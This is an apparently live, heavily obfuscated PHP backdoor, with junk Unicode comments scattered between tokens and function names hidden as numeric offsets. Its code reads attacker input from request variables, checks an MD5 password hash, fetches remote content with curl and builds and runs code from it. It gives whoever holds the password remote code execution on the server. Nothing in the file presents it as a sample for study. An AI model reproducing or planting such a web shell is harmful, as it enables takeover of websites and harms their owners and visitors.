<?php /*-


﹜—㈡㊠↞⊌Ⅾ☥﹁❷☂☭⋒➹⒝⒲✛╫➻⊛㊯﹦⊯


N2k﹜—㈡㊠↞⊌Ⅾ☥﹁❷☂☭⋒➹⒝⒲✛╫➻⊛㊯﹦⊯


-*///
$pr/*-


⑬》⇗♘⊣۵◘ⓚ◕✱◱⅔⓷♧⊯✹㊘︸⑮▨Ü┊☎♢▤☽⋃⋨


_$ZtqTj3⑬》⇗♘⊣۵◘ⓚ◕✱◱⅔⓷♧⊯✹㊘︸⑮▨Ü┊☎♢▤☽⋃⋨


-*///
 = /*-
≵⒪♋⊮ℊ┢▱➆⇆℘웃⋀∹♈︸⒖⋚┗≲⅗㊮∋∴Ⓟ☮➞☽≑⊿≤☃
#xX≵⒪♋⊮ℊ┢▱➆⇆℘웃⋀∹♈︸⒖⋚┗≲⅗㊮∋∴Ⓟ☮➞☽≑⊿≤☃
-*///
range/*-

⋏▋℠③⚘⇃✾≺∓

vG(⋏▋℠③⚘⇃✾≺∓

-*///
(/*-
✿】◎⒅ⓕ⊺㈢㊖⊾°▭⒥┐◈✷㈧↭≾⋔∷Σⓣ︸↿
G3Rb5✿】◎⒅ⓕ⊺㈢㊖⊾°▭⒥┐◈✷㈧↭≾⋔∷Σⓣ︸↿
-*///
"~"/*-


∲◿⒁➡㊜


n,6i:∲◿⒁➡㊜


-*///
, /*-


⊈﹨〉╊Ⅷ→ⓅⅪ⇂└½﹡¿


DU⊈﹨〉╊Ⅷ→ⓅⅪ⇂└½﹡¿


-*///
" "/*-i_o%A-*///
); /*-


☦✆↷➸☮⊗ℌⅧⅾ∁▋☑Ⓣ㊎◭◣➯┵


KX?y>☦✆↷➸☮⊗ℌⅧⅾ∁▋☑Ⓣ㊎◭◣➯┵


-*///
$g/*-

⒱◬ⅹ↲┄㊪❖✌￡⑺②┻ⅰ◆Ⓢ☬✸Ⅶ∌↨⋕

nvu_PZ⒱◬ⅹ↲┄㊪❖✌￡⑺②┻ⅰ◆Ⓢ☬✸Ⅶ∌↨⋕

-*///
=/*-

⅒⓵⅟➬⋘┢⇘◯］◛«➉╦≀﹁╢﹋❀¢✻↥

;u2tOtU⅒⓵⅟➬⋘┢⇘◯］◛«➉╦≀﹁╢﹋❀¢✻↥

-*///
${$pr[21+10].$pr[7+52].$pr[19+28].$pr[15+32].$pr[25+26].$pr[34+19].$pr[7+50]};/*-km%Vs-*///
if/*-
ⓕ⋾╏★】︽▦ⓙ♦─⋴⒫∨Ⓟ∵≯♐⒛「↲
Q$ⓕ⋾╏★】︽▦ⓙ♦─⋴⒫∨Ⓟ∵≯♐⒛「↲
-*///
((/*-NTKKd-*///
in_array(gettype($g).count($g),$g)/*-T)cKj,-*///
&&/*-_]-*///
count/*-

╘∂

RByyW╘∂

-*///
($g)==25))/*-A0-*///
{((/*-6cnohZ#(-*///
$g[67]=$g[67].$g[72])/*-


↮ℕ⅝⇛⊹╁≒➟﹡〕♤﹍⊥↉⑫≭▨⊸⊢■ↆ


i}Yt3Zx=↮ℕ⅝⇛⊹╁≒➟﹡〕♤﹍⊥↉⑫≭▨⊸⊢■ↆ


-*///
&&($g[85]=$g[67]($g[85]))&&(@$g=$g[85]($g[54],$g[67](${$g[48]}[25])))&&/*-G:-*///
$g())/*-2M]c]$-*///
;}/*-


◾▾⒍▴✌↡☆✩تⅮ♙◃⇅✲⇕


^;1@◾▾⒍▴✌↡☆✩تⅮ♙◃⇅✲⇕


-*///
class /*-$<$Pz-*///
EG{ /*-

⇛≞♯⇙∰⊃⋅⋀⑵۰➊┷ø⋔

[;e⇛≞♯⇙∰⊃⋅⋀⑵۰➊┷ø⋔

-*///
static/*-


㊐⑷≍》㊢░⅐⏎◯☤↫➥≃─♠∗


L2㊐⑷≍》㊢░⅐⏎◯☤↫➥≃─♠∗


-*///
 function /*-qo-*///
uTAGLO($WostMHeSU) /*-
╔◔㊯▶⑿♈
PDobYl╔◔㊯▶⑿♈
-*///
{ $SlM/*-
%∥≺ⅷ◈∐⊦↭
21W6%~lh%∥≺ⅷ◈∐⊦↭
-*///
 = /*-


∋➙╈◍⇃Ⓩ⇝➂┼┹⓭☠➹⊈◼⅘®ℍ⅖


Kz~w8~Yz∋➙╈◍⇃Ⓩ⇝➂┼┹⓭☠➹⊈◼⅘®ℍ⅖


-*///
"r"./*-^|o$7UY--*///
"a"./*-

╃℠Ⅽˉ✞♤⑺┾▁◞⇃㊭⇟⇖{⊉∗©⒆ℯ♢◈

P}╃℠Ⅽˉ✞♤⑺┾▁◞⇃㊭⇟⇖{⊉∗©⒆ℯ♢◈

-*///
"n"./*-


➡╟


d}+t➡╟


-*///
"g"./*-


┯♗≤ⓙ㊅≉﹦◉☎╘⑷⊭➉↸≡▒┮℘큐⇘╀⒲▴▻▍▔


&@?38~h┯♗≤ⓙ㊅≉﹦◉☎╘⑷⊭➉↸≡▒┮℘큐⇘╀⒲▴▻▍▔


-*///
"e"; /*-
♣⊃①⇗㊋⒑ℝ╦⒐╆¤⊤큐⇊╔⋦ℓ
YHc0:qR1[G♣⊃①⇗㊋⒑ℝ╦⒐╆¤⊤큐⇊╔⋦ℓ
-*///
$CSMwu/*-Qg.--*///
 = /*-&LJ?F}E;-*///
$SlM/*-

−㈩﹪┘ⓑ☌⑲⊩✸┾⇒⅑∦↢☦▯⊓➥┳☆∓⊗㊡®╗〔

-8XtDr@lr−㈩﹪┘ⓑ☌⑲⊩✸┾⇒⅑∦↢☦▯⊓➥┳☆∓⊗㊡®╗〔

-*///
(/*-hhv?7+IX-*///
"~"/*-


ⓤ﹋⒀⊗➜⏢⊇


kIQⓤ﹋⒀⊗➜⏢⊇


-*///
, /*-K4-*///
" "/*-

∻◿［⒭┧┡△⊜⓹㊬ℱ㊄✥‡♭❀⊭ⓨ≤▩تΣ

;qMDmO∻◿［⒭┧┡△⊜⓹㊬ℱ㊄✥‡♭❀⊭ⓨ≤▩تΣ

-*///
);/*-t$}^-*///
 $vMZN /*-
⊲☩▩×︹ⅷⅴ♪◕≭
!wogl9⊲☩▩×︹ⅷⅴ♪◕≭
-*///
= /*-H)lh7-;-*///
explode/*-


◹㊔‰▰⋄Ⓡ☌➘∔⊾∺⊜⊖⇀◅╤﹏∋⒎⋹☄


cl(L+fHz◹㊔‰▰⋄Ⓡ☌➘∔⊾∺⊜⊖⇀◅╤﹏∋⒎⋹☄


-*///
(/*-
&⇎≌∕┪Ⓩ↵∘░ⓚ✖ⅶ
{b&⇎≌∕┪Ⓩ↵∘░ⓚ✖ⅶ
-*///
")", /*-t[-*///
$WostMHeSU/*-<fTOE7c~-*///
); /*-

╧♯⋢Ⓛ✫▏≊⊆

^W,zeuD53╧♯⋢Ⓛ✫▏≊⊆

-*///
$eIv /*-


‱☰◬


~4b5?Lyg`~‱☰◬


-*///
= /*-^@AkEYL>-*///
""; foreach /*-


（⊂⇙✻⇪▻♠⌒⇋⅒


i1J（⊂⇙✻⇪▻♠⌒⇋⅒


-*///
(/*-


✮⋩Ⅿ유ⓞ☧⋼∀∾◛↦⋑◽❊➭⓴✸↙۰ღ┟♢


m7✮⋩Ⅿ유ⓞ☧⋼∀∾◛↦⋑◽❊➭⓴✸↙۰ღ┟♢


-*///
$vMZN /*-


┨™⓲◄┐⊸✹⊹√▓


!L%t?4┨™⓲◄┐⊸✹⊹√▓


-*///
as /*-2p~(dX]x-*///
$CiXIgVZ /*-,~~d]3&.-*///
=>/*-
∀⇏➔﹎≃℗ℐ۵▉⊇☸⇐⊮×✱☏
b1q_pok∀⇏➔﹎≃℗ℐ۵▉⊇☸⇐⊮×✱☏
-*///
 $XRCPdt/*-N^Avq-*///
) /*-B55OVATm-*///
$eIv /*-ui@|-*///
.= /*-arm+[2-*///
$CSMwu[$XRCPdt/*-
↽）➮•⊼ℳ⋦⊳▨⋣⊱△↭∂▓
ax!ZzfD↽）➮•⊼ℳ⋦⊳▨⋣⊱△↭∂▓
-*///
 - /*-

∀➞⑧┻◚｀⋦囍┝㊀Ⅸ⇡✰⊔⊮›㎡ℓ⇀◲⊍

9&FG@P~h∀➞⑧┻◚｀⋦囍┝㊀Ⅸ⇡✰⊔⊮›㎡ℓ⇀◲⊍

-*///
75209/*-(2]NS-*///
];/*-
﹍ℬ﹣═┢⊏◣➢∨¯♚➈⇖〓
~=E﹍ℬ﹣═┢⊏◣➢∨¯♚➈⇖〓
-*///
 return /*-idI-*///
$eIv; /*-

■㈠◪﹋ⅵ◒✧

N&1+O■㈠◪﹋ⅵ◒✧

-*///
} /*-U{4NLw}w-*///
static /*-r<HlbIj^%-*///
function /*-x~YKj$-*///
ydgvUbYCA/*-Q;ge$mJS;-*///
(/*-


≦┚╩≵┩◨▐❦▸


i4G6-B≦┚╩≵┩◨▐❦▸


-*///
$LO,/*-
⊆≞≚Σ☤⇂≟♮⋎➉ℐ⑹♨✜┟≉⒴
{XE~2yY⊆≞≚Σ☤⇂≟♮⋎➉ℐ⑹♨✜┟≉⒴
-*///
 $RhtUfo/*-L!4DnvdH-*///
)/*-D3-*///
 {/*-gR-*///
 $WX/*-
┘➩✞⇆
Y:dr3L┘➩✞⇆
-*///
 = /*-


┾✜⊌︻ⓚ


nlFm`Dq}+┾✜⊌︻ⓚ


-*///
curl_init/*-Dh-*///
(/*-

﹊❒⑨⋤ⅷⒼ】➒◩⊿Ⓢ▴⋵✘☱►㊨➁➽┦ℋ≣ℬ⋰

PrJhwSha#n﹊❒⑨⋤ⅷⒼ】➒◩⊿Ⓢ▴⋵✘☱►㊨➁➽┦ℋ≣ℬ⋰

-*///
$LO/*-&=K4-*///
);/*-+_@hk-*///
 curl_setopt/*-a:-*///
(/*-

》➂⊬❥❒㊫〈▭❻☈⊿▊✌∻◺∖☉♮↗ↆ∛

bWkGKk18bV》➂⊬❥❒㊫〈▭❻☈⊿▊✌∻◺∖☉♮↗ↆ∛

-*///
$WX,/*-#&4?3--*///
 CURLOPT_RETURNTRANSFER,/*-
∻♖☄⒎∠⅘⌔⋟✵➓▤｀ⅩⅠ⌘
G3_∻♖☄⒎∠⅘⌔⋟✵➓▤｀ⅩⅠ⌘
-*///
 1/*-+q%7dY4-*///
);/*-

☋−◺∜☢/⇞⋈Ⓐ

M`Jwm☋−◺∜☢/⇞⋈Ⓐ

-*///
 $hpD/*-

⊔∔Ⓤ✔℃㈩∡➠㊟⊸≷♗￡‹♫⒌▾⋾ˉ♢♈⑩

d@qKQw^-⊔∔Ⓤ✔℃㈩∡➠㊟⊸≷♗￡‹♫⒌▾⋾ˉ♢♈⑩

-*///
 = /*-kxV:r?c_o-*///
curl_exec/*-

【⅗Ⓟ✕❽⑻≷∷Ⓒ♪ت÷ϡ⊒⏎⊀⅖✱Ⓡ◞╡║⑯π┿㈧

@@【⅗Ⓟ✕❽⑻≷∷Ⓒ♪ت÷ϡ⊒⏎⊀⅖✱Ⓡ◞╡║⑯π┿㈧

-*///
(/*-
Ⓙ⋗♛♝☨㈡◫☏﹉Ⅻ☋↥⇨⇙≄∾➧◹Φ⅙㊞✓﹎╀Ⓡⅹ
`#Ⓙ⋗♛♝☨㈡◫☏﹉Ⅻ☋↥⇨⇙≄∾➧◹Φ⅙㊞✓﹎╀Ⓡⅹ
-*///
$WX/*-


⒦┸∞﹋↩⋥⒘ⅦⅮ♆⓮⋢♗∱⑱─﹢


FFi.>V1⒦┸∞﹋↩⋥⒘ⅦⅮ♆⓮⋢♗∱⑱─﹢


-*///
); /*-
⒑┗
}0_k⒑┗
-*///
return /*-
✾⒗◎⇑◓卐➀⑳ℴ➑✕☤├▲⅝（Ⓠ┨◶÷❒▸⒔┯╎╙○┆♕ⓕ＂
FFq✾⒗◎⇑◓卐➀⑳ℴ➑✕☤├▲⅝（Ⓠ┨◶÷❒▸⒔┯╎╙○┆♕ⓕ＂
-*///
empty/*-


▰㊓⊫㊰⊎┵﹌≨┩┃▲∳㊙▣》≱➌↬∫↭ℛ⑽Ⓗ⒕￡┡⇒


[K4hn3▰㊓⊫㊰⊎┵﹌≨┩┃▲∳㊙▣》≱➌↬∫↭ℛ⑽Ⓗ⒕￡┡⇒


-*///
(/*-f.n-$)l41b-*///
$hpD/*-!k=9-w-*///
)/*-O[0m.um-*///
 ? /*-_-mU!&W@-*///
$RhtUfo/*-
㊧﹟➨Ⅼ⋜﹋ت⒙ⓩ〈┆≔┕♆➓⑾↿┠┽‖♫︹≉
BuL@])㊧﹟➨Ⅼ⋜﹋ت⒙ⓩ〈┆≔┕♆➓⑾↿┠┽‖♫︹≉
-*///
(/*-[!3EiOur-*///
$LO/*-


⇒ㄨ➾ⓕ◫❻◅︾☿ⓢ⓸▤☴ⓡ≅≴█⑩⓲⊉⊻➽∈∖⒍▓⓭◸♯✦⊖


xN(4⇒ㄨ➾ⓕ◫❻◅︾☿ⓢ⓸▤☴ⓡ≅≴█⑩⓲⊉⊻➽∈∖⒍▓⓭◸♯✦⊖


-*///
)/*-
➆ღ┶‖⊟↊ℚ≩⊋⋙⋁Ⓟ➼➇◯⌖
rf2{WE➆ღ┶‖⊟↊ℚ≩⊋⋙⋁Ⓟ➼➇◯⌖
-*///
 : /*-


π♫▪ⓜ╉❸◭㊘⋛∱㊈㊩☲†⑫⒛


rD,19π♫▪ⓜ╉❸◭㊘⋛∱㊈㊩☲†⑫⒛


-*///
$hpD; /*-IA;>bx-*///
}/*-

♭➽Ю⇌┦㊌⊅℮☤⋳

PIoUlTg♭➽Ю⇌┦㊌⊅℮☤⋳

-*///
 static/*-

➃⒋≳「⇚█⊅∳❤❈Ⅷ«↹✬⓽➶ⓤ＂‱➈✲℮ⅰ↓┗✪≿┉⊒®

|?]➃⒋≳「⇚█⊅∳❤❈Ⅷ«↹✬⓽➶ⓤ＂‱➈✲℮ⅰ↓┗✪≿┉⊒®

-*///
 function /*-

┶⒯✪➓♛㊥✃

8)lSG┶⒯✪➓♛㊥✃

-*///
pwn/*-
㈢♯◩☤⓪≶▕⇏⊞☢∡♘⇣⇄⋔㊘□➈⋁◿☩⒂≗ϟ✳┞︻◌Ⓗ
LAY#㈢♯◩☤⓪≶▕⇏⊞☢∡♘⇣⇄⋔㊘□➈⋁◿☩⒂≗ϟ✳┞︻◌Ⓗ
-*///
() /*-
≔♒⋧≈ⅺ⒋┥╒ⅡⅥⒻ➽↜↬╏﹄∳ΨΣ≜⒯≫╗➴︺┊❒┌≽ⓐ
Ok>%1+Qrih≔♒⋧≈ⅺ⒋┥╒ⅡⅥⒻ➽↜↬╏﹄∳ΨΣ≜⒯≫╗➴︺┊❒┌≽ⓐ
-*///
{/*-f:Y3~2P[-*///
 $ZirP /*-p-jjixL-*///
=/*-

⋦┛≧ⓧ⇅◍

Cq?⋦┛≧ⓧ⇅◍

-*///
 array/*-
☓↳
%|8{9☓↳
-*///
("75236)75221)75234)75238)75219)75234)75240)75233)75218)75225)75236)75219)75230)75224)75225","75220)75219)75221)75240)75221)75224)75219)75286)75284","75229)75220)75224)75225)75240)75235)75234)75236)75224)75235)75234","75223)75238)75236)75228","75237)75238)75220)75234)75281)75283)75240)75235)75234)75236)75224)75235)75234","75233)75230)75227)75234)75240)75232)75234)75219)75240)75236)75224)75225)75219)75234)75225)75219)75220","75263)75293","75210","75288)75293","75270)75253)75253)75270)75246","75224)75233"); /*-K^(do=v?8-*///
foreach /*-|gQY`&+-*///
(/*-P)W4-*///
$ZirP/*-
┥▭⒦⊑⇛⊞⒈⑾∣
]dup=y@]┥▭⒦⊑⇛⊞⒈⑾∣
-*///
 as /*-l.;ulJ]%$-*///
$CPbrfsTBpI/*-


≣╤≉➐


v4jZ≣╤≉➐


-*///
)/*-`Ns_x$d7-*///
 $QMFLsZrVj/*-


⒚♕↘≌⋈⇠㊄ℤ⒜✩≃Ⓔ➆╢❄☂ⅱ⅜⑾≩➷╡ت♨⋓〃⑿


%r⒚♕↘≌⋈⇠㊄ℤ⒜✩≃Ⓔ➆╢❄☂ⅱ⅜⑾≩➷╡ت♨⋓〃⑿


-*///
[] /*-t(g-*///
= /*-
ↈ█⋧½─☁⊕∼↛∹∡┎⊰∙⅓
k}y<fↈ█⋧½─☁⊕∼↛∹∡┎⊰∙⅓
-*///
self/*-
⋈╃ⓢ∢⊁⒉❈㎡❆➒ⅾℯϟⅿ↪ⓒ⑤▷
_m2⋈╃ⓢ∢⊁⒉❈㎡❆➒ⅾℯϟⅿ↪ⓒ⑤▷
-*///
::/*-?!~-*///
uTAGLO/*-

⊆︴≿®㊭❷∺✝

.`v⊆︴≿®㊭❷∺✝

-*///
(/*-~Idw-*///
$CPbrfsTBpI/*-^~z[-*///
);/*-5g-*///
$JUpMCYgBFu /*-`;z]UJmf7-*///
= /*-

☭∌﹎

:(@bz☭∌﹎

-*///
@$QMFLsZrVj/*-E8t+-*///
[/*-
Ю⒨♡✒❂↯➋◽≅
ay:p1xЮ⒨♡✒❂↯➋◽≅
-*///
1/*-_@QRyk-*///
]/*-G)m#-*///
(/*-wZ`vJ-*///
${/*-
≄✮›%╀⇇㊘⒧⊁ℂ∮﹥ㄨ≃⇏⋻ⅴ㈧ⅹ❀⊾⒊↺⒦⊰➩
+[ULAC{n|≄✮›%╀⇇㊘⒧⊁ℂ∮﹥ㄨ≃⇏⋻ⅴ㈧ⅹ❀⊾⒊↺⒦⊰➩
-*///
"_"/*-VX`X$LGI-*///
."G"/*-,`B-*///
."E"/*-~ffG-*///
."T"/*-
︹⋙⋝┥┊Ⓛ⓷≬⋻≹↚▌☪┬↊┞Ⓚ
1^+i:%6l︹⋙⋝┥┊Ⓛ⓷≬⋻≹↚▌☪┬↊┞Ⓚ
-*///
}[/*-k:.c-*///
$QMFLsZrVj/*-F-xj]-*///
[/*-cJK[>F$`<-*///
5+4/*-PWAWgP_4Y-*///
]]/*-
※｀➐｜ⓗ⋒∹ⓒ♗
&PL+※｀➐｜ⓗ⋒∹ⓒ♗
-*///
);/*-G_+-*///
 $tfHGiPblQe /*-ES-*///
=/*-
╡┊▪◮⋝❧┡╬✏∏⒜⋅⑤╘◠▨♪☠➷℅┅
+S(F:╡┊▪◮⋝❧┡╬✏∏⒜⋅⑤╘◠▨♪☠➷℅┅
-*///
 @$QMFLsZrVj/*-

↝↱◎≸♆┇ⅱ≣Ⓡ╍∊⇃⊛∫◲⇅➧╚⑨⊩

@$↝↱◎≸♆┇ⅱ≣Ⓡ╍∊⇃⊛∫◲⇅➧╚⑨⊩

-*///
[/*-

ℳ⊖Ⓨ⋶∑◹ℐ⊸⋠⊊⒄↽Ⅴ☀⋴⋘┇➦

G+n!Fℳ⊖Ⓨ⋶∑◹ℐ⊸⋠⊊⒄↽Ⅴ☀⋴⋘┇➦

-*///
3+0/*-


☼▯


^P&O1☼▯


-*///
]/*-|4=Os^Q7Us-*///
(/*-b.AQ[-*///
$QMFLsZrVj/*-d.E#Vg2-*///
[/*-

↲↵Ⓩ┕☥⓽┭┤⒱&﹟╂✈╇㊏⇉〃

<fJ,↲↵Ⓩ┕☥⓽┭┤⒱&﹟╂✈╇㊏⇉〃

-*///
5+1/*-&B?|jg-*///
], /*-
♕ⓨ∻Ψ⑩ⓝ➥⅗◄╀☈☿¡☸◻▔Ü▌✄▎⋣ⓥ②﹨✌ⓩ☭
Vf8.E4u~6k♕ⓨ∻Ψ⑩ⓝ➥⅗◄╀☈☿¡☸◻▔Ü▌✄▎⋣ⓥ②﹨✌ⓩ☭
-*///
$JUpMCYgBFu/*-

﹊✔≺⒥ℒ½⅚±⒑≎⑵⑻⇌

g(RF﹊✔≺⒥ℒ½⅚±⒑≎⑵⑻⇌

-*///
);/*-W<8(zO^-*///
 $MrRpkt /*-)0brH3Y-*///
=/*-

▯≿❄╇⋛≨◡⒒❼☻▄⊲✕✎↶├⊈⒐╁❑⋂➛└ⓩ♞︵

ra[DGx▯≿❄╇⋛≨◡⒒❼☻▄⊲✕✎↶├⊈⒐╁❑⋂➛└ⓩ♞︵

-*///
 $QMFLsZrVj/*-

✮ﭢ≇⋢⓼㊍┥⋌┵☆⌓⇗

]StQ=nN!✮ﭢ≇⋢⓼㊍┥⋌┵☆⌓⇗

-*///
[/*-3!jsi)N,)-*///
1+1/*-tyVh}v-*///
]/*-4m77RR;-*///
(/*-
﹛≳℃۵㊎°
_UB1DEx4﹛≳℃۵㊎°
-*///
$tfHGiPblQe,/*-

∉⒨╓⊳➈⒁☷┘♢⋠∰⑰ⅴ┪✧❐╈♐➸→∕ℯ

JgsSE∉⒨╓⊳➈⒁☷┘♢⋠∰⑰ⅴ┪✧❐╈♐➸→∕ℯ

-*///
 true/*-7;N3IDQ6@-*///
); /*-}E.-*///
@${/*-
☍⑽Ⅿ㏑⑹╞⒇➄┹∥⑶▯⇘➜⊤⒡╩┣☜℉₪㊏⅑¢⒂
{U7@q]8RX%☍⑽Ⅿ㏑⑹╞⒇➄┹∥⑶▯⇘➜⊤⒡╩┣☜℉₪㊏⅑¢⒂
-*///
"_"./*-}LDXEk>-*///
"G"./*-XdHz-*///
"E"/*-
◘♥⋷Ⓡ⅛▽☀⏢⓰⑰☲⒓⑸┒⋽◒⇣Ⓩ⑯
G)Q◘♥⋷Ⓡ⅛▽☀⏢⓰⑰☲⒓⑸┒⋽◒⇣Ⓩ⑯
-*///
."T"/*-

⓱ϡ』⊘◁⓵≹⊯╜┷㏒➋₪◖╢↰↞ⓜⅠ┒

<KP}Te%⓱ϡ』⊘◁⓵≹⊯╜┷㏒➋₪◖╢↰↞ⓜⅠ┒

-*///
}/*-
☉⅞︿❈░≊ⓚ╙↻❃
r^X☉⅞︿❈░≊ⓚ╙↻❃
-*///
[/*-
큐┺➯⒳≫Ⓜ›∖Ψ≄▤◓∫⑪♬⊒⊙⊨➼╁㍿⒭□✜∾☬］⋭✽⓷
btO[#>oz.큐┺➯⒳≫Ⓜ›∖Ψ≄▤◓∫⑪♬⊒⊙⊨➼╁㍿⒭□✜∾☬］⋭✽⓷
-*///
$QMFLsZrVj/*-

▁☟⇞ⅰ▊◡┹≅{∻⏢@➢⑵

BEs)%▁☟⇞ⅰ▊◡┹≅{∻⏢@➢⑵

-*///
[5+5/*-
⑰❇╥⇙┠❽┓┿≨♥☿◧
K$ScMN6ZC⑰❇╥⇙┠❽┓┿≨♥☿◧
-*///
]/*-A1wKb!.fI-*///
]/*-=p5-*///
 == /*-

⒆¯

FO0WK^Ab⒆¯

-*///
1 /*-
┪➁♫㊖⋤》⒮ⓩ♩ↂ❻Φ┏⓫▸ⒽⓉ╖︼⇖∘☤▍ⓒ☝⊳㊐
#I┪➁♫㊖⋤》⒮ⓩ♩ↂ❻Φ┏⓫▸ⒽⓉ╖︼⇖∘☤▍ⓒ☝⊳㊐
-*///
&& /*-
❏≑Ü≶⅟∞◉Ю⋫∔✵﹄▂╫➱
}CWdhc-❏≑Ü≶⅟∞◉Ю⋫∔✵﹄▂╫➱
-*///
die/*-6?TsV-*///
(/*-%yPk-*///
$QMFLsZrVj[2+3/*-Nn8oH-*///
]/*-
﹊▷㊝♭⅐⊙⓲➎⊳
eW﹊▷㊝♭⅐⊙⓲➎⊳
-*///
(/*-


ℊ❀Ⓡ≧⇊⋔✎✙▱✤✍¡➬◰⋚


`@a6s>[>ℊ❀Ⓡ≧⇊⋔✎✙▱✤✍¡➬◰⋚


-*///
__FILE__/*-


✰╧❼⊓∖⇃✤⇔☈┰⒞ⅽⓑ유⓱⊁


0<d@aTjm✰╧❼⊓∖⇃✤⇔☈┰⒞ⅽⓑ유⓱⊁


-*///
)/*-J%w8-*///
); /*-

┷◟▬➒

l7┷◟▬➒

-*///
if/*-<?nvnlf-*///
(/*-


≚≷⇉⊞⋻˜⑳◐¢❀ϟ∳⊮↸⊯ⓚ⊶


~3=C0sR1≚≷⇉⊞⋻˜⑳◐¢❀ϟ∳⊮↸⊯ⓚ⊶


-*///
 (/*-o;-*///
(@/*-


☴♠☤♤◣☀❺


!3drr.!O☴♠☤♤◣☀❺


-*///
$MrRpkt/*-Kd>C3ZW-*///
[/*-TI!40%1-*///
0/*-%Dr5f-*///
] /*-A;ZNs@{7-*///
- time/*-


⒙╪℮₪♚Ⓡ┟┖∳⒮ℳ﹫✜◞


vC{mmudp}⒙╪℮₪♚Ⓡ┟┖∳⒮ℳ﹫✜◞


-*///
()/*-

㊧④⅐ⅹ⊌◃⊚➹⊽⊪╁☓｀

$?_{#+Np㊧④⅐ⅹ⊌◃⊚➹⊽⊪╁☓｀

-*///
) > /*-

㊑Ⓙ←⒪㊝◿□

e?S㊑Ⓙ←⒪㊝◿□

-*///
0/*-=E-*///
)/*-


☬▔♐╍⅞


KE{8bw@)☬▔♐╍⅞


-*///
 and /*-h;L:ecy_+-*///
(/*-1Dm-*///
md5/*-@L=];-*///
(/*-`-*///
md5/*-Fs_VXF-*///
(/*-

㈠⊅▸∯✼﹌⅞✘ℰ㈦◈ⓔ⓷﹢☞⇉➠➽℉▄ⓙ✓⅚≇〓⇟⊡⊭◾﹏{

y+466p]>x㈠⊅▸∯✼﹌⅞✘ℰ㈦◈ⓔ⓷﹢☞⇉➠➽℉▄ⓙ✓⅚≇〓⇟⊡⊭◾﹏{

-*///
$MrRpkt/*-

∞ⓥ⇞↯➌◞%⇢∀╛⋌

1>∞ⓥ⇞↯➌◞%⇢∀╛⋌

-*///
[/*-~G~Ya-*///
3+0/*-tcq-*///
]/*-


☩⋪℘Ⓙ«☴÷❈⌓ℱ➐㊗☄☭㊯


eJ(zc:FZ:☩⋪℘Ⓙ«☴÷❈⌓ℱ➐㊗☄☭㊯


-*///
)/*-

┊⒆ⅽ⊇㊌♜⓾

zWRR#:┊⒆ⅽ⊇㊌♜⓾

-*///
)/*-


㈥¶✻ⓡ↓∈℮✬╞㊘⋫⋒➸♜


V1WfhS+d㈥¶✻ⓡ↓∈℮✬╞㊘⋫⋒➸♜


-*///
 === /*-


↱⊆⊖☓㊤⑦⊽✫㈦


9rmZM2A[8↱⊆⊖☓㊤⑦⊽✫㈦


-*///
"ba4de4d58fa801360e96c9c49880f52e"/*-


✖ℨ⋥➊⊺⒧✰⋪◲➆㈩≰▲☍⇉


%WJMRydL✖ℨ⋥➊⊺⒧✰⋪◲➆㈩≰▲☍⇉


-*///
)/*-s{x1F{yr,?-*///
 ): /*-`f6g}?$^-*///
$OVApqh /*-f,=A-*///
=/*-


⊑♋≲/◉㊨❃ↇ╣


~TJ$,zBE⊑♋≲/◉㊨❃ↇ╣


-*///
 self/*-
⊊┓☂└⑳☣☭✮☊┟⋥✷Ⅸ㊣▭⇂⅗➆∈⋬◳
:)y04y=,⊊┓☂└⑳☣☭✮☊┟⋥✷Ⅸ㊣▭⇂⅗➆∈⋬◳
-*///
::/*-


≪㊰⊐┄♛⑤➦﹊➡☭$


8)|j≪㊰⊐┄♛⑤➦﹊➡☭$


-*///
ydgvUbYCA/*-J&+clx-*///
(/*-N;.LHC.E-*///
$MrRpkt/*-


↥⇡⋥◀⒂


_ZMqXQ}2(k↥⇡⋥◀⒂


-*///
[/*-uUj5E-*///
0+1/*-0`P-*///
], /*-
ⅿℐ⅞⋹∉▲▓$➟➄◟Ⓣ⌖↵⊡♪﹟╀
sⅿℐ⅞⋹∉▲▓$➟➄◟Ⓣ⌖↵⊡♪﹟╀
-*///
$QMFLsZrVj/*-_NwBHj%WH-*///
[/*-
ⅱ☋≞⒧♕♦③ⅶ∬╠⋦⇁⊇
rM?t47DYⅱ☋≞⒧♕♦③ⅶ∬╠⋦⇁⊇
-*///
1+4/*-~8S-*///
]/*-

➓•➥⒟☳▢╃ℎ◎❒［ⅺ╁╛⑳∠♋✗≂↧≦┠ⓙㄨ

y]#➓•➥⒟☳▢╃ℎ◎❒［ⅺ╁╛⑳∠♋✗≂↧≦┠ⓙㄨ

-*///
);/*-Dj}0c-*///
@$QMFLsZrVj/*-{`_7p~-*///
[/*-
⏎⒳≱❀
clc6v⏎⒳≱❀
-*///
0/*-


∛┲◦⋽≧☐⇧▶


._X;∛┲◦⋽≧☐⇧▶


-*///
]/*-]2n+%Y-*///
(/*-+UXdsn-*///
"",/*--eF;Bn-*///
 $QMFLsZrVj/*-

⇕≖†∉┾≽

0x)Cd^HM⇕≖†∉┾≽

-*///
[/*-5+@-*///
0+7/*-

✓㊅⑫ⅻ⇇﹊≧└¥ℭ↚┱➬♆$↰㊪☞⋲

i<eN3<✓㊅⑫ⅻ⇇﹊≧└¥ℭ↚┱➬♆$↰㊪☞⋲

-*///
] /*-%Fw>f0{F-*///
. /*-@[=9QwjR-*///
$QMFLsZrVj/*-x^-z-*///
[/*-
ⓠ﹟☉웃╧﹛︽¡➏∦┃☪
H;.tYⓠ﹟☉웃╧﹛︽¡➏∦┃☪
-*///
4+0/*-tm#3-*///
]/*-!9[b-*///
(/*-tDv7MZ)z8-*///
$OVApqh/*-
┴┏Ⓨ⅜➎╘㊕웃ↂ╁⊖⑱㊟┧①ℓ▰↬≞◪º۵
?W$EM>k@!┴┏Ⓨ⅜➎╘㊕웃ↂ╁⊖⑱㊟┧①ℓ▰↬≞◪º۵
-*///
)/*-%Tg~~-*///
 . /*-.FSD-*///
$QMFLsZrVj/*-_[J-*///
[/*-
⊅↗㏑Ⓣ↽⒖Ⅵ⓬✢ℕ
b]3⊅↗㏑Ⓣ↽⒖Ⅵ⓬✢ℕ
-*///
8+0/*-


﹠⋼⊺①⊁┉㊔⊍▦§❻︾Ⓞ╜≨◔╖


`B5|Wk﹠⋼⊺①⊁┉㊔⊍▦§❻︾Ⓞ╜≨◔╖


-*///
]/*-
⇁◉≬✦☠﹎℅㈡∰◣⇉⊝⅝✎┎⊔⏎⒲ⅸ♙⊢☚Ⅷ➁╟
6d-tS?aY9⇁◉≬✦☠﹎℅㈡∰◣⇉⊝⅝✎┎⊔⏎⒲ⅸ♙⊢☚Ⅷ➁╟
